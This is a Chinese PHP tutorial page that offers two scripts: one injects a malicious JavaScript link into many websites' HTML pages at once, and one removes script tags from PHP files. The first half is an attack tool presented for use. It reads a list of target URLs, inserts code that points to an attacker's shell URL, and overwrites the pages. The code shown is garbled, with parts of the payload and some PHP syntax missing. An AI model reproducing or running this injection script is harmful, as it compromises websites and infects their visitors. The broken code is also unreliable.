php下批量挂马和批量清马代码

为了防范网络黑客的攻击,网站管理员需要了解网站被挂马后的处理方式。一般在PHP语言下,网站被挂马的原因是服务端的文件有漏洞,或者被管理员账户密码泄露,网站的代码造成的后果就是在用户请求页面时,程序会在页面HTML代码中嵌入一个恶意脚本或链接,使得用户在访问页面时会自动执行恶意脚本或链接,从而感染用户的电脑或手机。下面我们将为您介绍如何通过PHP代码来批量挂马和清马。

批量挂马代码

  1. 首先,使用以下命令创建一个新的PHP文件批量挂马:

shell
vi hack.php

  1. 写入以下代码,获取目标网站HTML页面并向其中插入恶意JavaScript代码:

```php
\n"; $js .= "var link = document.createElement('a');\n"; $js .= "link.href='".$shell_url."';\n"; $js .= "document.body.appendChild(link);\n"; $js .= "\n";

// 将生成的JavaScript代码插入到目标网站页面中
$html = str_replace("",$js. "", $html);
$handle = fopen($url, "w");
fwrite($handle, $html); // 写入添加恶意链接的页面代码
fclose($handle);
}
?>

```

以上代码中,$urls是包含目标网站URL链接的txt文件,$shell_url是恶意JavaScript链接。代码中首先读取URL列表文件,然后循环遍历每个URL链接中的页面,将恶意代码插入到HTML中,最后将修改后的HTML页面写回到服务器中。

  1. 运行挂马脚本 hack.php ,执行以下命令:

shell
php hack.php

运行后,PHP脚本会根据 urls.txt 文件内的URL信息,将恶意脚本插入到每个HTML页面中。

示例:我们将 urls.txt 文件设置为包含两个URL链接:

https://example.com/page1.html
https://example.com/page2.html

运行脚本后,PHP会替换每个HTML页面文件中的 </head> 元素标签下部分,使用以下代码将恶意链接插入HTML页面中:

```html


```

批量清马代码

  1. 首先,使用以下命令创建一个新的PHP文件批量清理马:

shell
vi clean.php

  1. 写入以下代码,用于批量清理所有PHP文件中的恶意脚本:

```php

.*?<\/script>/si", "", $file_contents);

   // 将处理后的内容写回到文件中
   file_put_contents($file, $cleaned_contents);

} ?> ```

以上代码中,首先定义了 search_files 方法用于递归查找目录下符合条件的文件,然后定义了 $start_dir 文件起始路径和 $regex_pattern 要查找的文件后缀,最后通过正则表达式匹配所有包含恶意脚本的PHP文件,将里面的脚本部分删除并保存修改后的文件。

  1. 运行 clean.php 脚本,执行以下命令:

shell php clean.php

执行该命令后,PHP会查找包含指定后缀的PHP文件,并将其中的恶意脚本删除。

示例:有一个被挂马的PHP文件 foo.php,既包含正常PHP代码也包含恶意代码:

```php

... ...



```

在运行清理脚本之后,上述PHP文件中的恶意脚本代码将被移除,只剩下正常PHP代码:

```php



...


...

```
以上就是批量挂马和清理马的完整攻略。

本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:php下批量挂马和批量清马代码 - Python技术站

(0)
上一篇 2023年5月23日
下一篇 2023年5月23日

相关文章

  • 使用PHP接受文件并获得其后缀名的方法

    接受文件并获得其后缀名可以使用PHP中的$_FILES数组来完成,具体步骤如下: 1. 创建HTML表单 首先需要在HTML中创建一个表单,用于向后台提交数据并上传文件。以下是一个示例: <form action="upload.php" method="post" enctype="multipart…

    PHP 2023年5月27日
    00
  • php-app开发接口加密详解

    PHP-App开发接口加密详解 什么是接口加密? 接口加密是为了保证数据传输时的安全性,实现数据在传输过程中的加密,防止数据被窃取或者被篡改。接口加密可以通过多种方式实现,包括加密算法、数字证书、令牌验证等。 为什么需要接口加密? 当我们的应用程序需要与其它应用程序进行交互时,需要使用接口来实现数据交互。而接口在传输数据的过程中,可能会被黑客攻击或者信息被窃…

    PHP 2023年5月26日
    00
  • php高级编程-函数-郑阿奇

    “PHP高级编程-函数-郑阿奇”是一本介绍PHP函数编程高级技巧的书籍。本书主要围绕函数命名、参数传递、异常处理、闭包、匿名函数、反射等多个方面展开介绍。 1. 函数命名 函数命名是编程中非常重要的一部分。良好的函数命名可以提高代码的可读性,使得函数的用途清晰明了。在命名函数时,可以考虑以下几点: 函数名应该尽可能简短,以体现代码的简洁性。 函数名应该具有表…

    PHP 2023年5月23日
    00
  • PHP运用foreach神奇的转换数组(实例讲解)

    下面详细讲解“PHP运用foreach神奇的转换数组(实例讲解)”的完整攻略。 什么是foreach转换数组 在PHP中,有时候需要把一个数组转换为另一个数组。这时候就可以使用foreach循环来进行处理。foreach循环可以遍历原数组的每个元素,并在遍历的过程中对每个元素进行处理,从而生成一个新的数组。 foreach转换数组的基本语法 下面是使用for…

    PHP 2023年5月26日
    00
  • 简单谈谈php浮点数精确运算

    题目:简单谈谈PHP浮点数精确运算 为了精确处理浮点数,我们应该使用“BC函数库”和“GMP函数库”以及PHP7引入的“内置函数 intdiv() ”。 BC函数库的使用 BC函数库是一个高精度数学函数库,可以进行任意精度数字的加、减、乘、除等运算。 具体用法 BC函数库的使用需要用户开启PHP.ini配置文件中的 “bcmath” 扩展,加入 extens…

    PHP 2023年5月26日
    00
  • php中加密解密DES类的简单使用方法示例

    下面是详细讲解“php中加密解密DES类的简单使用方法示例”的完整攻略。 什么是DES加密算法 DES全称为Data Encryption Standard,是一种使用密钥加密的对称算法,也是比较流行的加密算法之一。 PHP中DES加密解密类的使用方法 在PHP中,你可以使用mcrypt扩展中的DES加密解密类来实现DES算法的加解密功能。下面我将一步步为你…

    PHP 2023年5月26日
    00
  • PHP实现绘制二叉树图形显示功能详解【包括二叉搜索树、平衡树及红黑树】

    让我来详细讲解如何用PHP实现绘制二叉树图形显示功能的完整攻略。在这个过程中,我将给出两个示例说明。 一、概述 在现代化的计算机科学算法中,二叉树在很多领域得到了广泛应用,比如搜索树、平衡树和红黑树等。在进行这些算法的实现时,我们通常需要对二叉树进行可视化展示,方便我们更好地理解和调试代码。本文将要介绍如何使用PHP来实现绘制二叉树图形显示功能。 二、绘制二…

    PHP 2023年5月26日
    00
  • PHP常用代码大全(新手入门必备)

    下面就针对“PHP常用代码大全(新手入门必备)”这个主题,给出一份完整的攻略。首先,需要明确以下几个问题: 你所使用的PHP版本是什么? 你的目的是什么?是想学习常用的PHP代码,还是想寻找一些常用的PHP代码段简化自己的工作? 如果你的PHP版本是5.4或以上,我建议你使用命名空间和自动加载作为你的PHP开发的基础概念,这将帮助你更方便、更简单地管理你的代…

    PHP 2023年5月23日
    00
合作推广
合作推广
分享本页
返回顶部